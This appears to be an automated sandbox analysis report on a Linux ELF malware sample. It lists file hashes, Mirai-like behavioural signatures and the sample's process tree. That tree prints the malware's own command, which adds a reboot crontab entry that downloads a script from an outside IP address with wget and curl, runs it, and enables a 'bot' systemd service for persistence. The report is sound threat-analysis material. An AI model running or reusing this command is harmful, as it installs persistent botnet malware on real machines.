Analysis

  • max time kernel
    141s
  • max time network
    154s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20231215-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu1804-amd64-20231215-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    08/01/2024, 03:41

General

  • Target
    9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
  • Size
    64KB
  • MD5
    ccdcabc06ed12d315440fabad4c0e7a9
  • SHA1
    08603a1dc5aded6cd1d271a4d8d57bccb5c64495
  • SHA256
    9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff
  • SHA512
    2ff4c9983ab2addab390bca1dd34fe88c36d51028723d58a3ba742e8cb86a39e175f6dabb04c9960f2db84f17c5fc067eb8afa8119bf3bd6e498f22da6eadda2
  • SSDEEP
    1536:a3NvZJP6+ckhKHOBXygfki1An01Y0ff7VuCRerRY:kNhJS+YOBNMi1W0yYjAwKY

Score
7/10

Malware Config

Signatures

  • Changes its process name 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Modifies systemd 1 TTPs 1 IoCs

    Adds/modifies systemd service files, likely to achieve persistence.

  • Modifies Bash startup script 1 TTPs 1 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
    /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
    • Changes its process name
    • Modifies Watchdog functionality
    PID:1525
  • /bin/sh
    sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
    PID:1530
      • /usr/bin/crontab
        crontab -
        • Creates/modifies Cron job
        PID:1532
      • /bin/sh
        sh bins.sh
        PID:1531
      • /usr/bin/crontab
        crontab -l
        PID:1533
        • /bin/chmod
          chmod +x bins.sh
          PID:1534
          • /bin/sh
            sh bins.sh
            PID:1535
            • /bin/curl
              /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh
              PID:1536
              • /bin/chmod
                chmod +x bins.sh
                PID:1537
                • /bin/sh
                  sh -c "/bin/systemctl enable bot"
                  PID:1538
                  • /bin/systemctl
                    /bin/systemctl enable bot
                    PID:1539

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /lib/systemd/system/bot.service
    Filesize 368B
    MD5 d77308e381db6ea7245af6f3b7be118e
    SHA1 0a0f20a03f4db351a404954c780eebd15b3775bb
    SHA256 feb6c31fee6eedbf83b5d657838427588bc7426532238a2675b8dbb74c9bf55b
    SHA512 68c2b02daaaaa8d34e8f0a9264894fd781527b3b855477ac9435145daf5063e46d9abd7684f7c52be4f27850890be5261837dd3ad3f7a5a54d9343e2e6cda0e4
  • /var/spool/cron/crontabs/tmp.uIfVKk
    Filesize 241B
    MD5 2f16a50a03b078ad9d67f3835641e9fd
    SHA1 8317001974fe8b4806e2377f4e62f9c74d588388
    SHA256 2d76916fafe2a76c0ec1fe539d813bec0aa03cf12d6a5301490d21dff498698f
    SHA512 20b097960cce1f804f9be20f7ec9f36c75bfaba2dfaf6bf083433229d38db19896e9b95110eb47e6cafb69c8bc8f916a668115c2187ff00acf8833d607a18c85